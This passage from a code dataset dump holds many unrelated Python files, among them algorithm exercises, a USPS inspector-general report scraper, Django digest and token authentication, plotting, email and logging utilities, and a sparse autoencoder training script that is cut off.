m['kml'].optimize()\n ll1, ll2 = m['gpy'].log_likelihood(), m['kml'].log_likelihood()\n assert_array_almost_equal(ll1, ll2, decimal=-1) \n\nT = TestRegression()\nT.test_gp_grief_model_some_active()","sub_path":"tests/test_models/test_regression.py","file_name":"test_regression.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"409115638","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n# https://leetcode.com/discuss/16567/concise-solution-using-with-detailed-alogrithm-description\n\n\nclass Solution(object):\n\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if head is None or head.next is None:\n return None\n\n hare = turtle = entry = head\n\n while hare.next and hare.next.next:\n turtle = turtle.next\n hare = hare.next.next\n if turtle == hare:\n while turtle != entry:\n turtle = turtle.next\n entry = entry.next\n return entry\n return None\n","sub_path":"python/142 Linked List Cycle II.py","file_name":"142 Linked List Cycle II.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"349039167","text":"from scoping import scoping\n#scoping.settle(globals())\n\na = 2\nwith scoping():\n assert(2 == a)\n a = 3\n b = 'BB'\n scoping.keep('b')\n assert(3 == a)\nassert(2 == a)\nassert('BB' == b)\n","sub_path":"tests/small.py","file_name":"small.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"380075203","text":"from manimlib.imports import *\r\n\r\ndef debugTeX(self, texm):\r\n for i,j in enumerate(texm):\r\n tex_id = Integer(i).scale(0.3).set_color(RED)\r\n tex_id.move_to(j)\r\n self.add(tex_id)\r\n\r\ndef debugPoints(self, obj):\r\n for i,points in enumerate(obj.get_points()):\r\n point_id = Integer(i).scale(0.5).set_color(PURPLE_A)\r\n point_id.move_to(points)\r\n self.add(point_id)\r\n","sub_path":"Ag/MyCode/debugTexPoints.py","file_name":"debugTexPoints.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"328673655","text":"#!/usr/bin/env python\n\nfrom utils import utils, inspector\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport logging\n\n# oldest year: 1998\n#\n# options:\n# standard since/year options for a year range to fetch from.\n#\n# pages - number of pages to fetch. defaults to all of them (using a very high number)\n# begin - what page number to begin at. defaults to 1.\n# types - limit reports fetched to one or more types, comma-separated. e.g. \"audit,testimony\"\n# can include:\n# audit - Audit Reports\n# testimony - Congressional Testimony\n# press - Press Releases\n# research - Risk Analysis Research Papers\n# interactive - SARC (Interactive)\n# congress - Semiannual Report to Congress\n# defaults to\n# including audits, reports to Congress, and research\n# excluding press releases, SARC, and testimony to Congress\n\n# This will actually get adjusted downwards on the fly, so pick a huge number.\n# There are 164 pages total (page=163) as of 2014-07-27, so let's try, er, 1000.\nALL_PAGES = 1000\n\n\ndef run(options):\n year_range = inspector.year_range(options)\n pages = options.get('pages', ALL_PAGES)\n\n # default to starting at page 1\n begin = int(options.get('begin', 1))\n\n max_page = None\n for page in range(begin, (int(pages) + 1)):\n if max_page and (page > max_page):\n logging.debug(\"End of pages!\")\n break\n\n logging.debug(\"## Downloading page %i\" % page)\n url = url_for(options, page)\n body = utils.download(url)\n doc = BeautifulSoup(body)\n\n # When the USPS restores their page controls, we can use this again,\n # which saves one network call each time.\n max_page = last_page_for(doc)\n\n results = doc.select(\".views-row\")\n\n for result in results:\n report = report_from(result)\n\n # inefficient enforcement of --year arg, USPS doesn't support it server-side\n # TODO: change to published_on.year once it's a datetime\n if inspector.year_from(report) not in year_range:\n logging.warn(\"[%s] Skipping report, not in requested range.\" % report['report_id'])\n continue\n\n inspector.save_report(report)\n\n\n# extract fields from HTML, return dict\ndef report_from(result):\n report = {\n 'inspector': 'usps',\n 'inspector_url': 'https://uspsoig.gov/',\n 'agency': 'usps',\n 'agency_name': 'United States Postal Service'\n }\n\n pieces = result.select(\"span span\")\n report_type = type_for(pieces[0].text.strip())\n\n if len(pieces) == 3:\n timestamp = pieces[2].text.strip()\n report['%s_id' % report_type] = pieces[1].text.strip()\n elif len(pieces) == 2:\n timestamp = pieces[1].text.strip()\n\n published_on = datetime.strptime(timestamp, \"%m/%d/%Y\")\n\n report['type'] = report_type\n report['published_on'] = datetime.strftime(published_on, \"%Y-%m-%d\")\n\n # if there's only one button, use that URL\n # otherwise, look for \"Read Full Report\" (could be first or last)\n buttons = result.select(\"a.apbutton\")\n if len(buttons) > 1:\n link = None\n for button in buttons:\n if \"Full Report\" in button.text:\n link = button['href']\n elif len(buttons) == 1:\n link = buttons[0]['href']\n report['url'] = link\n\n # get filename, use name as report ID, extension for type\n filename = link.split(\"/\")[-1]\n extension = filename.split(\".\")[-1]\n report['report_id'] = filename.replace(\".\" + extension, \"\")\n\n report['title'] = result.select(\"h3\")[0].text.strip()\n\n return report\n\ndef type_for(original_type):\n original = original_type.lower()\n if \"audit\" in original:\n return \"audit\"\n elif \"testimony\" in original:\n return \"testimony\"\n elif \"press release\" in original:\n return \"press\"\n elif \"research\" in original:\n return \"research\"\n elif \"sarc\" in original:\n return \"interactive\"\n elif \"report to congress\":\n return \"congress\"\n else:\n return None\n\n# get the last page number, from a page of search results\n# e.g.
  • 158
  • \ndef last_page_for(doc):\n page = doc.select(\"li.pager-item.last\")[0].text.replace(\"of \", \"\").strip()\n if page and len(page) > 0:\n return int(page)\n\n # this means we're on the last page, AFAIK\n else:\n return -1\n\n\n# The USPS IG only supports a \"since\" filter.\n# So, if we get a --year, we'll use it as \"since\", and then\n# ignore reports after parsing their data (before saving them).\n# Inefficient, but more efficient than not supporting --year at all.\ndef url_for(options, page=1):\n year_range = inspector.year_range(options)\n\n url = \"https://uspsoig.gov/document-library?\"\n\n # there's always a first year, and it defaults to current year\n since = \"%s-01-01\" % year_range[0]\n url += \"&field_doc_date_value[value][date]=%s\" % since\n\n only = options.get('types')\n if not only:\n only = \"audit,congress,research\"\n only = only.split(\",\")\n params = [\"field_doc_cat_tid[]=%s\" % CATEGORIES[id] for id in only]\n url += \"&%s\" % str.join(\"&\", params)\n\n # they added this crazy thing\n annoying_prefix = \"0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C\"\n\n # page is 0-indexed\n if page > 1:\n url += \"&page=%s%i\" % (annoying_prefix, (page - 1))\n\n return url\n\n\nCATEGORIES = {\n 'audit': '1920',\n 'testimony': '1933',\n 'press': '1921',\n 'research': '1922',\n 'interactive': '3487',\n 'congress': '1923'\n}\n\n\nutils.run(run) if (__name__ == \"__main__\") else None\n","sub_path":"inspectors/usps.py","file_name":"usps.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"217111900","text":"# Given an array, return triplets that add up to the target sum\n# Idea: three pointers, let i = beggining of array, left = i + 1,\n# right = len(array) - 1, sum all three and find sum == target, if not\n# then increase left pointer if targetSum is greater, right pointer if \n# targetSum is less\n# O(n^2) time | O(n) space\ndef threeNumberSum(array, targetSum):\n # need this to be preformed on a sorted array\n array.sort()\n triplets = []\n # iterate through array - 2 b/c we are comparing 3 values\n for i in range(len(array) - 2):\n # Define left and right pointers\n left = i + 1\n right = len(array) - 1\n # Until array overlaps do this\n while left < right:\n # Calculate current sum from values of three pointers\n currentSum = array[i] + array[left] + array[right]\n # if triplets are a match append to output, array, update both pointers\n if currentSum == targetSum:\n triplets.append([array[i], array[left], array[right]])\n left += 1\n right -= 1\n # if our currentSum is more than target, increase only rright pointer and try again\n elif currentSum < targetSum:\n left += 1\n elif currentSum > targetSum:\n right -= 1\n return triplets\n","sub_path":"Python/array/three-sum.py","file_name":"three-sum.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"636190487","text":"from flask import Blueprint, render_template\nfrom webapp.services.workerListService import *\n\n\nworkerList = Blueprint('workerList', __name__)\n\n\n@workerList.route(\"/workers\", methods=[\"GET\"])\ndef list_worker():\n work_list_service = WorkListService()\n instances, cpu_charts, requests_charts = work_list_service.get_charts()\n instance, cpu_chart, request_chart = work_list_service.get_chart()\n\n return render_template(\"workerList.html\", charts=zip(instances, cpu_charts, requests_charts), manager_chart = zip(instance, cpu_chart, request_chart))\n","sub_path":"webapp/controllers/workerListController.py","file_name":"workerListController.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"508636660","text":"from typing import List\n\n\ndef tickets(lst: List[int]) -> str:\n \"\"\"\n The new \"Avengers\" movie has just been released!\n There are a lot of people at the cinema box office standing in a huge line.\n Each of them has a single 100, 50 or 25 dollars bill. An \"Avengers\" ticket costs 25 dollars.\n Vasya is currently working as a clerk. He wants to sell a ticket to every single person in this line.\n Can Vasya sell a ticket to each person and give the change if he initially has no money\n and sells the tickets strictly in the order people follow in the line?\n Return YES, if Vasya can sell a ticket to each person and give\n the change with the bills he has at hand at that moment.\n Otherwise return NO.\n\n :param lst: Array of \"user\" money\n :type lst: list\n :return str: YES or NO\n \"\"\"\n a, b = 0, 0\n\n for i in lst:\n if i == 25:\n a += 1\n elif i == 50:\n a -= 1\n b += 1\n elif i == 100:\n if b >= 1:\n a -= 1\n b -= 1\n else:\n a -= 3\n\n if (a < 0) or (b < 0):\n return \"NO\"\n\n return \"YES\"\n","sub_path":"src-python/vasya_clerk.py","file_name":"vasya_clerk.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"374288942","text":"import hashlib\nimport os\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.signing import Signer\nfrom django.utils import six\nfrom django.utils.six import text_type\n\nfrom digest import exceptions\nfrom digest.models import Token, DatabaseInterface\nfrom digest.utils import parse_dict_header\n\nHTTP_HEADER_ENCODING = 'iso-8859-1'\n\n\nUser = get_user_model()\n\n\ndef get_authorization_header(request):\n \"\"\"\n Return request's 'Authorization:' header, as a bytestring.\n Hide some test client ickyness where the header can be unicode.\n \"\"\"\n auth = request.META.get('HTTP_AUTHORIZATION', b'')\n if isinstance(auth, text_type):\n # Work around django test client oddness\n auth = auth.encode(HTTP_HEADER_ENCODING)\n return auth\n\n\nclass DigestAuthentication(object):\n \"\"\"\n HTTP Digest authentication against username/password.\n Compliant with RFC 2617 (http://tools.ietf.org/html/rfc2617).\n \"\"\"\n realm = 'django-rest-framework'\n hash_algorithms = {\n 'MD5': hashlib.md5,\n 'MD5-sess': hashlib.md5,\n 'SHA': hashlib.sha1}\n algorithm = 'MD5' # 'MD5'/'SHA'/'MD5-sess'\n # quality of protection\n qop = 'auth' # 'auth'/'auth-int'/None\n opaque = Signer().sign('DRFOPAQUE')\n\n def authenticate(self, request):\n if 'HTTP_AUTHORIZATION' in request.META:\n try:\n self.parse_authorization_header(\n request.META['HTTP_AUTHORIZATION']\n )\n except Exception:\n return None\n self.check_authorization_request_header()\n user = self.get_user()\n self.backend = DatabaseInterface(user)\n password = self.backend.get_password()\n if self.check_digest_auth(request, password):\n return user, None\n\n def authenticate_header(self, request):\n \"\"\"\n Builds the WWW-Authenticate response header\n \"\"\"\n nonce_data = '%s:%s' % (self.realm, os.urandom(8))\n nonce = self.hash_func(nonce_data)\n\n header_format = 'Digest realm=\"%(realm)s\", qop=\"%(qop)s\",' \\\n ' nonce=\"%(nonce)s\", opaque=\"%(opaque)s\",' \\\n ' algorithm=\"%(algorithm)s\"'\n header_values = {\n 'realm': self.realm,\n 'qop': self.qop,\n 'algorithm': self.algorithm,\n 'opaque': self.opaque,\n 'nonce': nonce}\n header = header_format % header_values\n return header\n\n def parse_authorization_header(self, auth_header):\n if not auth_header.startswith('Digest '):\n raise exceptions.BadHeaderException(\n 'Header do not start with Digest'\n )\n auth_header = auth_header.replace('Digest ', '')\n self.auth_header = parse_dict_header(auth_header)\n\n def check_authorization_request_header(self):\n \"\"\"\n The values of the opaque and algorithm fields must be those supplied\n in the WWW-Authenticate response header\n \"\"\"\n required_fields = ('username', 'realm', 'nonce', 'uri',\n 'response', 'algorithm', 'opaque')\n\n for field in required_fields:\n if field not in self.auth_header:\n raise Exception(\n 'Required field %s not found' % field)\n\n for field in ('opaque', 'algorithm', 'realm', 'qop'):\n if not self.auth_header[field] == getattr(self, field):\n raise Exception('%s provided not valid' % field)\n\n qop = self.auth_header.get('qop')\n if qop in ('auth', 'auth-int'):\n for c in ('nc', 'cnonce'):\n if c not in self.auth_header:\n raise Exception('%s is required' % c)\n if not qop:\n for c in ('nc', 'cnonce'):\n if c in self.auth_header:\n raise Exception('%s provided without qop' % c)\n\n def get_user(self):\n username = self.auth_header['username']\n try:\n username_field = 'username'\n if hasattr(User, 'USERNAME_FIELD'):\n username_field = User.USERNAME_FIELD\n args = {username_field: username}\n user = User.objects.get(**args)\n except (User.DoesNotExist, User.MultipleObjectsReturned):\n raise Exception\n return user\n\n def check_digest_auth(self, request, password):\n \"\"\"\n Check user authentication using HTTP Digest auth\n \"\"\"\n last_counter = self.backend.get_counter(\n self.auth_header['nonce'],\n self.auth_header['cnonce'],\n )\n current_counter = int(self.auth_header['nc'], 16)\n if last_counter is not None and not last_counter < current_counter:\n raise exceptions.UnauthorizedException\n else:\n self.backend.set_counter(\n self.auth_header['nonce'],\n self.auth_header['cnonce'],\n current_counter\n )\n\n response_hash = self.generate_response(request, password)\n return response_hash == self.auth_header['response']\n\n def generate_response(self, request, password):\n \"\"\"\n Compile digest auth response\n\n If the qop directive's value is \"auth\" or \"auth-int\":\n RESPONSE = HASH(HA1:nonce:nc:cnonce:qop:HA2)\n If the \"qop\" directive is not present:\n (this construction is for compatibility with RFC 2069)\n RESPONSE = MD5(HA1:nonce:HA2)\n \"\"\"\n HA1_value = self.create_HA1(password)\n HA2_value = self.create_HA2(request)\n\n if self.auth_header.get('qop') is None:\n response_data = ':'.join((\n HA1_value,\n self.auth_header['nonce'],\n HA2_value))\n response = self.hash_func(response_data)\n else:\n # qop is 'auth' or 'auth-int'\n response_data = \":\".join((HA1_value,\n self.auth_header['nonce'],\n self.auth_header['nc'],\n self.auth_header['cnonce'],\n self.auth_header['qop'],\n HA2_value))\n response = self.hash_func(response_data)\n return response\n\n def create_HA1(self, password):\n \"\"\"\n Create HA1 hash\n\n HA1 = HASH(A1) = HASH(username:realm:password)\n \"\"\"\n if self.algorithm == 'MD5-sess':\n data = ':'.join((\n self.auth_header['username'],\n self.realm,\n password))\n data_hash = self.hash_func(data)\n A1 = ':'.join((\n data_hash,\n self.auth_header['nonce'],\n self.auth_header['cnonce']))\n else:\n A1 = ':'.join((\n self.auth_header['username'],\n self.realm,\n password))\n return self.hash_func(A1)\n\n def create_HA2(self, request):\n \"\"\"\n Create HA2 hash\n\n If the \"qop\" directive's value is \"auth\" or is unspecified,\n then HA2 is:\n HA2 = HASH(A2) = HASH(request-method:digest-URI)\n If the qop directive's value is \"auth-int\", then HA2 is\n HA2 = HASH(A2) = HASH(request-method:digest-URI:MD5(entityBody))\n \"\"\"\n\n if self.auth_header.get('qop') in ('auth', None):\n A2 = ':'.join((request.method, self.auth_header['uri']))\n return self.hash_func(A2)\n elif self.auth_header.get('qop') == 'auth-int':\n body_hash = self.hash_func(request.body)\n A2 = ':'.join((request.method,\n self.auth_header['uri'],\n body_hash))\n return self.hash_func(A2)\n\n def hash_func(self, data):\n alg_hash_func = self.hash_algorithms[self.algorithm]\n return alg_hash_func(six.b(data)).hexdigest()\n\n\nclass TokenAuthentication(object):\n \"\"\"\n Simple token based authentication.\n Clients should authenticate by passing the token key in the \"Authorization\"\n HTTP header, prepended with the string \"Token \". For example:\n Authorization: Token 401f7ac837da42b97f613d789819ff93537bee6a\n \"\"\"\n\n keyword = 'Token'\n model = Token\n\n def __init__(self, user, token):\n self.user = user\n self.token = token\n\n def get_model(self):\n return self.model\n\n def authenticate(self, request):\n auth = get_authorization_header(request).split()\n\n if not auth or auth[0].lower() != self.keyword.lower().encode():\n return None\n\n if len(auth) == 1:\n msg = 'Invalid token header. No credentials provided.'\n raise Exception(msg)\n elif len(auth) > 2:\n msg = '''Invalid token header. Token string\n should not contain spaces.'''\n raise Exception(msg)\n\n try:\n token = auth[1].decode()\n except UnicodeError:\n msg = '''Invalid token header. Token string should \n not contain invalid characters.'''\n raise Exception(msg)\n\n return self.authenticate_credentials(token)\n\n def authenticate_credentials(self, key):\n model = self.get_model()\n try:\n token = model.objects.select_related('user').get(key=key)\n except model.DoesNotExist:\n raise Exception('Invalid token.')\n\n if not token.user.is_active:\n raise Exception('User inactive or deleted.')\n\n return (token.user, token)\n\n def authenticate_header(self, request):\n return self.keyword\n","sub_path":"digest/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":9682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"249046281","text":"\nfrom typing import Optional\nimport sys\nimport os\nimport logging\n\nfrom . import logger, logger_protocol\nfrom . import client\n\n\n__all__ = [\n 'setup_basic_logging',\n 'run_program',\n]\n\n\ndef setup_basic_logging(log_level: Optional[str] = None, protocol_log_level: Optional[str] = None,\n target=sys.stderr) -> None:\n if log_level is None:\n log_level = os.environ.get('PYCOZMO_LOG_LEVEL', logging.INFO)\n if protocol_log_level is None:\n protocol_log_level = os.environ.get('PYCOZMO_PROTOCOL_LOG_LEVEL', logging.WARNING)\n handler = logging.StreamHandler(stream=target)\n formatter = logging.Formatter(\n fmt=\"%(asctime)s.%(msecs)03d %(name)-20s %(levelname)-8s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(log_level)\n logger_protocol.addHandler(handler)\n logger_protocol.setLevel(protocol_log_level)\n\n\ndef run_program(f: callable, log_level: Optional[str] = None, protocol_log_level: Optional[str] = None,\n protocol_log_messages: Optional[list] = None) -> None:\n setup_basic_logging(log_level=log_level, protocol_log_level=protocol_log_level)\n\n cli = client.Client(protocol_log_messages=protocol_log_messages)\n cli.start()\n cli.connect()\n cli.wait_for_robot()\n\n try:\n f(cli)\n except KeyboardInterrupt:\n logger.info(\"Interrupted...\")\n finally:\n cli.disconnect()\n cli.stop()\n\n logger.info(\"Done.\")\n","sub_path":"pycozmo/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"629216975","text":"from flyingpigeon import visualisation as vs\nfrom pywps.Process import WPSProcess\n\nfrom flyingpigeon.log import init_process_logger\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass plottimeseriesProcess(WPSProcess):\n def __init__(self):\n # definition of this process\n WPSProcess.__init__(\n self,\n identifier=\"plot_timeseries\",\n title=\"Plots -- timeseries\",\n version=\"0.9\",\n metadata=[\n {\"title\": 'Plots timeseries'}\n ],\n abstract=\"Outputs some timeseries of the file field means. Spaghetti and uncertainty plot\",\n statusSupported=True,\n storeSupported=True\n )\n\n self.resource = self.addComplexInput(\n identifier=\"resource\",\n title=\"NetCDF Files\",\n abstract=\"NetCDF Files\",\n minOccurs=1,\n maxOccurs=100,\n maxmegabites=5000,\n formats=[{\"mimeType\": \"application/x-netcdf\"}],\n )\n\n self.variableIn = self.addLiteralInput(\n identifier=\"variable\",\n title=\"Variable\",\n abstract=\"Variable to be expected in the input files (variable will be detected if not set)\",\n default=None,\n type=type(''),\n minOccurs=0,\n maxOccurs=1,\n )\n\n self.plotout_spagetti = self.addComplexOutput(\n identifier=\"plotout_spagetti\",\n title=\"Visualisation, Spaghetti plot\",\n abstract=\"Visualisation of single variables as a spaghetti plot\",\n formats=[{\"mimeType\": \"image/png\"}],\n asReference=True,\n )\n\n self.plotout_uncertainty = self.addComplexOutput(\n identifier=\"plotout_uncertainty\",\n title=\"Visualisation, Uncertainty plot\",\n abstract=\"Visualisation of single variables ensemble mean with uncertainty\",\n formats=[{\"mimeType\": \"image/png\"}],\n asReference=True,\n )\n\n self.output_log = self.addComplexOutput(\n identifier=\"output_log\",\n title=\"Logging information\",\n abstract=\"Collected logs during process run.\",\n formats=[{\"mimeType\": \"text/plain\"}],\n asReference=True,\n )\n\n def execute(self):\n\n init_process_logger('log.txt')\n self.output_log.setValue('log.txt')\n from flyingpigeon.utils import archiveextract\n\n ncfiles = archiveextract(self.getInputValues(identifier='resource'))\n var = self.variableIn.getValue()\n\n if var is None:\n from flyingpigeon.utils import get_variable\n var = get_variable(ncfiles[0])\n\n self.status.set('plotting variable %s' % var, 10)\n\n try:\n plotout_spagetti_file = vs.spaghetti(\n ncfiles,\n variable=var,\n title='Fieldmean of %s ' % (var),\n dir_out=None\n )\n logger.info(\"spagetti plot done\")\n self.status.set('Spagetti plot for %s %s files done' % (len(ncfiles), var), 50)\n except:\n logger.exception(\"spagetti plot failed\")\n\n try:\n plotout_uncertainty_file = vs.uncertainty(\n ncfiles,\n variable=var,\n title='Ensemble uncertainty for %s ' % (var),\n dir_out=None\n )\n\n self.status.set('Uncertainty plot for %s %s files done' % (len(ncfiles), var), 90)\n logger.info(\"uncertainty plot done\")\n except:\n logger.exception(\"uncertainty plot failed\")\n\n self.plotout_spagetti.setValue(plotout_spagetti_file)\n self.plotout_uncertainty.setValue(plotout_uncertainty_file)\n self.status.set('visualisation done', 100)\n","sub_path":"flyingpigeon/processes/wps_plot_timeseries.py","file_name":"wps_plot_timeseries.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"534945294","text":"import matplotlib as mpl\nimport numpy as np\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nsns.set()\n\nfile_name = 'nohup.out'\n\nwith open(file_name) as f:\n content = f.readlines()\n f.close()\n\ndata = []\nfor row in content:\n if(row.split('/')[0].isdigit()):\n data.append(row)\n\n if('loss:' in row):\n data.append(row)\n\n\nepochs = []\ntrain_loss = []\nvalidation_loss = []\ntrain_loss_val = []\ncurr_t_loss = 0\nfor d in data:\n row = d.split(' ')\n \n if('loss:' in d):\n val_loss = d.split(':')[1].strip()\n validation_loss.append(float(val_loss))\n train_loss_val.append(curr_t_loss)\n continue\n\n\n if(len(row) < 5):\n continue\n \n epoch = int(row[0].split('/')[0])\n tloss = float(row[3].split('=')[1])\n curr_t_loss = tloss\n epochs.append(int(epoch))\n train_loss.append(float(tloss))\n\nfig, (ax1, ax2) = plt.subplots(1,2)\nfig.suptitle('Training loss')\n\nax1.plot(epochs, train_loss)\nax1.set_title('Training loss')\nax1.set_ylabel('Loss')\nax1.set_xlabel('Epochs')\n\nax2.plot(np.arange(len(validation_loss)), validation_loss, label='validation')\nax2.plot(np.arange(len(validation_loss)), train_loss_val, label='train')\nax2.set_title('Validation vs Training loss')\nax2.set_ylabel('Loss')\nax2.set_xlabel('# validation, every 1000 epoch')\nax2.legend()\n\n#plt.xlabel('Epochs')\n#plt.ylabel('Loss')\n\nfig.savefig('loss_plotv2')\n","sub_path":"loss_graph.py","file_name":"loss_graph.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"411979123","text":"#!/usr/bin/env python\n# Import smtplib for the actual sending function\nimport smtplib\n\ndef sendEmail(theSubject, theTo, theFrom=\"av-mail-sender@stanford.edu\", theContents=\"\"):\n from email.mime.text import MIMEText\n msg = MIMEText(theContents)\n\n msg['Subject'] = theSubject\n msg['From'] = theFrom\n msg['To'] = \",\".join(theTo)\n\n s = smtplib.SMTP('smtp.stanford.edu')\n s.starttls();\n s.sendmail(theFrom, theTo, msg.as_string())\n s.quit()\n\nif __name__ == \"__main__\":\n import argparse;\n parser = argparse.ArgumentParser(\"Script for email sending\");\n parser.add_argument(\"--to\", nargs=\"+\",required=True);\n parser.add_argument(\"--sender\",default=\"av-mail-sender@stanford.edu\");\n parser.add_argument(\"--subject\",required=True);\n parser.add_argument(\"--contents\", default=\"\");\n options = parser.parse_args();\n sendEmail(options.subject, options.to, options.sender, options.contents);\n\n\n","sub_path":"util/sendEmail.py","file_name":"sendEmail.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"82172013","text":"\n\nfrom xai.brain.wordbase.verbs._denigrate import _DENIGRATE\n\n#calss header\nclass _DENIGRATES(_DENIGRATE, ):\n\tdef __init__(self,): \n\t\t_DENIGRATE.__init__(self)\n\t\tself.name = \"DENIGRATES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"denigrate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_denigrates.py","file_name":"_denigrates.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"323331215","text":"from __future__ import print_function\nimport sys\n\n# -----------------------------------------------------------------------------\n# Filter : Module\n# -----------------------------------------------------------------------------\n# list of module name (NOT class name)\nLOG_ENABLED_MODULES = [\n #\"aobjs\",\n #\"aobjs.deco\",\n #\"aobjs.deco.aodeco\",\n #\"aobjs.deco.underline\",\n #\"aobjs.aobj\",\n #\"aobjs.atext\",\n #\"core\",\n \"core.aomgr\",\n #\"debug\",\n #\"debug.log\",\n #\"geo\",\n #\"geo.coordmath\",\n #\"geo.coordmath.point\",\n #\"geo.coordmath.rect\",\n #\"geo.coordmath.size\",\n #\"gui\",\n #\"gui.adc\",\n #\"gui.dgrmctrl\",\n #\"gui.frame\",\n #\"gui.setting\",\n #\"gui.tool\",\n #\"gui.toolselect\",\n #\"gui.tooltext\",\n #\"ascdgrm\",\n]\n\nLOG_ENSET = set()\nfor m in LOG_ENABLED_MODULES:\n LOG_ENSET.add(m)\n\n\n# -----------------------------------------------------------------------------\n# Filter : Level\n# -----------------------------------------------------------------------------\nLV_DISABLE, LVV, LVD, LVI, LVW, LVE = tuple(range(0, 6))\nLOGLV_MAP = {\n LVV: \"V\",\n LVD: \"D\",\n LVI: \"I\",\n LVW: \"W\",\n LVE: \"E\",\n}\n\nLOG_LEVEL = LVV\n\n# -----------------------------------------------------------------------------\n# Helper functions\n# -----------------------------------------------------------------------------\n_log_index = 0\ndef inc_and_get_log_index():\n global _log_index\n _log_index += 1\n return _log_index\n\n\nclass MyLogger(object):\n def __init__(self, module_name, level=LVV):\n self._modname = module_name\n if module_name in LOG_ENSET:\n self._lv = level\n else:\n self._lv = LV_DISABLE\n\n def _pr(self, lv, msg, *args, **kwargs):\n if (lv < LOG_LEVEL\n or self._lv < LOG_LEVEL):\n return\n\n funcname = sys._getframe(2).f_code.co_name\n newmsg = '<%(idx)3d>[%(lv)s]%(mod)s:%(func)s:%(msg)s' % {\n 'idx': inc_and_get_log_index(),\n 'lv': LOGLV_MAP[lv],\n 'mod': self._modname,\n 'func': funcname,\n 'msg': msg\n }\n print(newmsg, *args, **kwargs)\n\n def v(self, msg, *args, **kwargs):\n self._pr(LVV, msg, *args, **kwargs)\n\n def d(self, msg, *args, **kwargs):\n self._pr(LVD, msg, *args, **kwargs)\n\n def i(self, msg, *args, **kwargs):\n self._pr(LVI, msg, *args, **kwargs)\n\n def w(self, msg, *args, **kwargs):\n self._pr(LVW, msg, *args, **kwargs)\n\n def e(self, msg, *args, **kwargs):\n self._pr(LVE, msg, *args, **kwargs)\n\n\ndef build_module_logger(module_name):\n m = sys.modules[module_name]\n setattr(m, \"lgr\", MyLogger(module_name))\n","sub_path":"debug/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"152595206","text":"# Test the effect of different L in regularizer\n\nimport tensorflow as tf\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\nimport keras\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\n\nimport numpy as np\nimport pickle\nimport datetime\nimport time\nimport sys\n\nfrom sklearn import preprocessing\n\nprint('sae_l_test starting: {}'.format(datetime.datetime.now()), file=sys.stderr)\nstart = time.time()\n\nearly_stopping_monitor = keras.callbacks.EarlyStopping(monitor='loss', patience=20, verbose=1)\n\npklfile = '../../data/all_bands.pkl'\nwith open(pklfile, 'rb') as fi:\n data = pickle.load(fi)\n\ndata = preprocessing.MinMaxScaler().fit_transform(np.abs(data))\n\n\ndef sparseAutoencoder(feat_mat, l=1e-5, hidden_size=800, batch_size=128, epochs=2000):\n \n input_size = feat_mat.shape[1]\n\n\n x = Input(shape=(input_size,))\n h = Dense(hidden_size, activation='relu', activity_regularizer=keras.regularizers.l1(l))(x)\n r = Dense(input_size, activation='sigmoid')(h)\n\n ae = Model(inputs=x, outputs=r)\n ae.compile(optimizer='adam', loss='mse',metrics=['accuracy'])\n\n history = ae.fit(feat_mat, feat_mat, batch_size=batch_size,epochs=epochs, callbacks = [early_stopping_monitor])\n encoder = Model(x,h)\n return ae, encoder, history\n\n\nl_list = [1e-2, 1e-3, 1e-4, 1e-5, 1e-6, 1e-7]\nhis = []\n\nfor val in l_list:\n sae, sae_encoder, sae_his = sparseAutoencoder(data, l=val, 